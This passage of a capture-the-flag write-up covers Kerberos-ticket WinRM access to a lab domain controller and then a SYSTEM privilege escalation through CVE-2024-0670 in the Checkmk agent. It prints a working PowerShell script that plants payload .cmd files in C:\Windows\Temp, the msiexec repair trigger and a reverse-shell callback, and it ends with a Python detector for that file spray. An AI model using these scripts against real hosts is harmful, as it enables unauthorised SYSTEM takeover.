UPPER_REALM=$(echo "$LOWER_REALM" | tr '[:lower:]' '[:upper:]')
DC_HOSTNAME='DC01'

# placeholder tokens reconstructed; any unique strings work as long as the sed patterns match
cat << EOF | sed \
    -e "s/__UPPER_REALM__/$UPPER_REALM/g" \
    -e "s/__LOWER_REALM__/$LOWER_REALM/g" \
    -e "s/__DC_HOSTNAME__/$DC_HOSTNAME/g" > custom_krb5.conf
[libdefaults]
    default_realm = __UPPER_REALM__
    dns_lookup_realm = true
    dns_lookup_kdc = true

[realms]
    __UPPER_REALM__ = {
        kdc = __DC_HOSTNAME__.__LOWER_REALM__
        admin_server = __DC_HOSTNAME__.__LOWER_REALM__
        default_domain = __LOWER_REALM__
    }

[domain_realm]
    __LOWER_REALM__ = __UPPER_REALM__
    .__LOWER_REALM__ = __UPPER_REALM__
EOF

export KRB5_CONFIG=$(pwd)/custom_krb5.conf
export KRB5CCNAME=$(pwd)/monitoring_svc.ccache
Now we can connect over WinRM with that ticket using winrmexec.py (Kerberos auth from the ccache, no password, TLS on 5986 since that is the port nmap found):
winrmexec.py nanocorp.htb/monitoring_svc@dc01.nanocorp.htb -k -no-pass -ssl
/home/kali/.cache/uv/environments-v2/winrmexec-8aa50ec8544e68a3/lib/python3.13/site-packages/impacket/version.py:12: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
import pkg_resources
'prompt_toolkit' not installed, using built-in 'readline'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] '-target_ip' not specified, using dc01.nanocorp.htb
[*] '-port' not specified, using 5986
[*] '-url' not specified, using https://dc01.nanocorp.htb:5986/wsman
[*] using domain and username from ccache: NANOCORP.HTB\monitoring_svc
[*] '-spn' not specified, using HTTP/dc01.nanocorp.htb@NANOCORP.HTB
[*] '-dc-ip' not specified, using NANOCORP.HTB
[*] requesting TGS for HTTP/dc01.nanocorp.htb@NANOCORP.HTB
PS C:\Users\monitoring_svc\Documents> ls ../Desktop
Directory: C:\Users\monitoring_svc\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 11/8/2025 9:21 PM 34 user.txt
PS C:\Users\monitoring_svc\Documents>
Just like that, we have User!
Looking around, we find Checkmk, a monitoring agent, installed under Program Files (x86):
PS C:\w1ld> ls -fo 'C:\Program Files (x86)\'
Directory: C:\Program Files (x86)
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 4/5/2025 4:17 PM checkmk
d----- 5/8/2021 1:34 AM Common Files
d----- 11/3/2025 4:13 PM Internet Explorer
d----- 5/8/2021 2:40 AM Microsoft
d----- 5/8/2021 1:34 AM Microsoft.NET
d----- 5/8/2021 2:35 AM Windows Defender
d----- 11/3/2025 4:13 PM Windows Mail
d----- 11/3/2025 4:13 PM Windows Media Player
d----- 5/8/2021 2:35 AM Windows NT
d----- 11/3/2025 4:13 PM Windows Photo Viewer
d--hs- 5/8/2021 1:34 AM Windows Sidebar
d----- 5/8/2021 1:34 AM WindowsPowerShell
-a-hs- 5/8/2021 1:18 AM 174 desktop.ini
PS C:\w1ld>
Doing some research, we find CVE-2024-0670, a local privilege escalation in the Checkmk Windows agent. The mechanism is what the rest of this section exploits: while the agent package is being installed or repaired, a process running as SYSTEM drops batch files with predictable names (cmk_all_<pid>_1.cmd, cmk_data_<pid>_2.cmd) into C:\Windows\Temp and executes them. C:\Windows\Temp is writable by any local user, so whoever creates a file with the right name first gets its contents run as SYSTEM, and the repair itself can be kicked off from an unprivileged shell with msiexec /fa against the cached MSI. As monitoring_svc we aren't able to list the contents of C:\Windows\Temp, so let's swap over to web_svc using RunasCs.exe.
PS C:\w1ld> .\RunasCs.exe web_svc 'dksehdgh712!@#' C:\w1ld\comp_win.exe
comp_win.exe is a customized reverse shell for the competitive VPN for Windows hosts; I always have a few of these available to me.
Let’s take a look in the Temp directory.
PS C:\w1ld> whoami
nanocorp\web_svc
PS C:\w1ld> ls C:\Windows\Temp
Directory: C:\Windows\Temp
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 11/3/2025 5:05 PM vmware-SYSTEM
-a---- 11/8/2025 9:21 PM 53 af397ef28e484961ba48646a5d38cf54.db.ses
-a---- 11/8/2025 9:21 PM 0 mat-debug-5448.log
-a---- 11/8/2025 11:22 PM 33310 MpCmdRun.log
-a---- 11/8/2025 9:21 PM 102 silconfig.log
-a---- 11/4/2025 3:20 PM 189079 vmware-vmsvc-SYSTEM.log
-a---- 11/4/2025 3:18 PM 16602 vmware-vmtoolsd-Administrator.log
-a---- 11/8/2025 9:21 PM 20998 vmware-vmtoolsd-SYSTEM.log
-a---- 11/8/2025 9:38 PM 4891 vmware-vmtoolsd-web_svc.log
-a---- 11/4/2025 3:20 PM 66145 vmware-vmusr-Administrator.log
-a---- 11/8/2025 9:38 PM 5980 vmware-vmusr-web_svc.log
-a---- 11/8/2025 9:21 PM 20132 vmware-vmvss-SYSTEM.log
Now that we can list the directory, let's trigger a repair of the cached Checkmk MSI (msiexec /fa reinstalls all of its files) and immediately look at C:\Windows\Temp again; the files don't stay around for long:
PS C:\w1ld> msiexec /fa C:\Windows\Installer\1e6f2.msi
PS C:\w1ld> ls C:\Windows\Temp
Directory: C:\Windows\Temp
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 11/3/2025 5:05 PM vmware-SYSTEM
-a---- 11/8/2025 9:21 PM 53 af397ef28e484961ba48646a5d38cf54.db.ses
-a---- 11/8/2025 11:46 PM 1069 cmk_all_5252_1.cmd
-a---- 11/8/2025 11:46 PM 423 cmk_data_5252_2.cmd
-a---- 11/8/2025 9:21 PM 0 mat-debug-5448.log
-a---- 11/8/2025 11:22 PM 33310 MpCmdRun.log
-a---- 11/8/2025 9:21 PM 102 silconfig.log
-a---- 11/4/2025 3:20 PM 189079 vmware-vmsvc-SYSTEM.log
-a---- 11/4/2025 3:18 PM 16602 vmware-vmtoolsd-Administrator.log
-a---- 11/8/2025 9:21 PM 20998 vmware-vmtoolsd-SYSTEM.log
-a---- 11/8/2025 9:38 PM 4891 vmware-vmtoolsd-web_svc.log
-a---- 11/4/2025 3:20 PM 66145 vmware-vmusr-Administrator.log
-a---- 11/8/2025 9:38 PM 5980 vmware-vmusr-web_svc.log
-a---- 11/8/2025 9:21 PM 20132 vmware-vmvss-SYSTEM.log
The number in the file name (5252 in the run above) is a process ID, and the next repair will get a different but nearby PID, so we can't know the exact name in advance. Instead we pre-create every candidate name in a window around the observed PID, and mark each one read-only so that the agent's own write to that name fails rather than replacing our payload. Let's write a PowerShell script for that. I'll do about a thousand total, 500 before and 500 after, since that's how many the disk can carry as far as I can tell.
PS C:\w1ld> type w1ld.ps1
# plant one copy of the payload under every candidate name around the observed PID 5252
4752..5752 | foreach {
    copy C:\w1ld\root.exe C:\Windows\Temp\cmk_all_${_}_1.cmd;
    # read-only so the agent cannot overwrite the planted file with its own script
    Set-ItemProperty -path C:\Windows\Temp\cmk_all_${_}_1.cmd -name IsReadOnly -value $true;
}
root.exe is simply a tiny executable that reads root.txt and writes it to a file; you can also use a tiny reverse shell if you want, but keep in mind that Windows Defender is running.
Now run the script and then the repair straight after. Make sure the cmk_all files left over from the previous run have been deleted before running the script.
PS C:\w1ld> ./w1ld.ps1
PS C:\w1ld> msiexec /fa C:\Windows\Installer\1e6f2.msi
Just like that, we have Root!
Later on I discovered that, since the files are .cmd files, we can instead write a simple cmd script that launches my reverse shell; it's tiny enough to cover a massive range of process IDs for the file names.
PS C:\w1ld> type root.cmd
C:/w1ld/comp_win.exe
Let's also widen the script's PID range; with a tiny payload we can copy it many more times.
PS C:\w1ld> type w1ld.ps1
# same planter as before, just a much wider PID window now that the payload is a one-line .cmd
1000..9000 | foreach {
    copy C:\w1ld\root.cmd C:\Windows\Temp\cmk_all_${_}_1.cmd;
    Set-ItemProperty -path C:\Windows\Temp\cmk_all_${_}_1.cmd -name IsReadOnly -value $true;
}
Just as usual run the script and the installer.
PS C:\w1ld> ./w1ld.ps1
PS C:\w1ld> msiexec /fa C:\Windows\Installer\1e6f2.msi
And I receive a callback on my reverse shell listener!
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows
PS C:\Windows\system32> whoami
nt authority\system
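On the defensive side, the same predictable names make this spray easy to spot. The following is an added example of mine, not from the write-up or from Checkmk: it runs over constructed FileCreate records shaped like the Sysmon Event ID 11 fields `UtcTime|User|TargetFilename` and flags any account other than SYSTEM that creates cmk_*.cmd files directly under C:\Windows\Temp, since only the agent (as SYSTEM, during install or repair) should write them. The account names, timestamps and spray size in the sample are made up for the example.

```python
from __future__ import annotations

import re
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime

# The agent's temporary batch files sit directly under C:\Windows\Temp and carry a PID in
# the name (cmk_all_<pid>_1.cmd / cmk_data_<pid>_2.cmd, as seen in the listing above).
CMK_TEMP_CMD = re.compile(r"^C:\\Windows\\Temp\\cmk_(?:all|data)_(\d+)_\d+\.cmd$", re.IGNORECASE)
SYSTEM_ACCOUNTS = {"NT AUTHORITY\\SYSTEM"}


@dataclass
class Alert:
    user: str
    files: int
    pid_min: int
    pid_max: int
    first_seen: datetime
    last_seen: datetime


def parse_event(line: str) -> tuple[datetime, str, int] | None:
    """One record as 'UtcTime|User|TargetFilename'; returns (time, user, pid) for cmk files only."""
    try:
        ts, user, path = line.strip().split("|", 2)
    except ValueError:
        return None
    m = CMK_TEMP_CMD.match(path)
    if not m:
        return None
    return datetime.strptime(ts, "%Y-%m-%d %H:%M:%S.%f"), user, int(m.group(1))


def detect_planted_cmk_files(lines, min_files: int = 1) -> list[Alert]:
    """Flag every non-SYSTEM principal creating cmk_*.cmd files in C:\\Windows\\Temp.

    A single file is already wrong, because only the agent writes these; the PID span in
    the alert shows how wide the attacker's window was.
    """
    by_user: dict[str, list[tuple[datetime, int]]] = defaultdict(list)
    for line in lines:
        rec = parse_event(line)
        if rec is None:
            continue
        ts, user, pid = rec
        if user.upper() in SYSTEM_ACCOUNTS:
            continue  # legitimate writes by the agent during install/repair
        by_user[user].append((ts, pid))
    alerts: list[Alert] = []
    for user, recs in by_user.items():
        if len(recs) < min_files:
            continue
        times = [t for t, _ in recs]
        pids = [p for _, p in recs]
        alerts.append(Alert(user, len(recs), min(pids), max(pids), min(times), max(times)))
    return sorted(alerts, key=lambda a: a.first_seen)


# Constructed sample (not telemetry from the box): two legitimate files written by SYSTEM
# during a repair, an unrelated file, then a spray of pre-created names from a low-privileged
# account mirroring the planter script above.
SAMPLE_EVENTS = [
    "2025-11-08 23:46:02.101|NT AUTHORITY\\SYSTEM|C:\\Windows\\Temp\\cmk_all_5252_1.cmd",
    "2025-11-08 23:46:02.105|NT AUTHORITY\\SYSTEM|C:\\Windows\\Temp\\cmk_data_5252_2.cmd",
    "2025-11-08 23:46:03.000|NT AUTHORITY\\SYSTEM|C:\\Windows\\Temp\\MpCmdRun.log",
] + [
    f"2025-11-08 23:51:10.{i * 10:03d}|NANOCORP\\web_svc|C:\\Windows\\Temp\\cmk_all_{pid}_1.cmd"
    for i, pid in enumerate(range(4752, 4852))
]

if __name__ == "__main__":
    for a in detect_planted_cmk_files(SAMPLE_EVENTS):
        print(f"{a.user}: {a.files} cmk files, PIDs {a.pid_min}-{a.pid_max}, "
              f"{a.first_seen:%H:%M:%S} to {a.last_seen:%H:%M:%S}")
```

Pair this with a rule on msiexec.exe started by an interactive, non-administrative user with /f arguments shortly after such a burst: the two together are the whole exploit chain, and the repair step is the one the attacker cannot avoid.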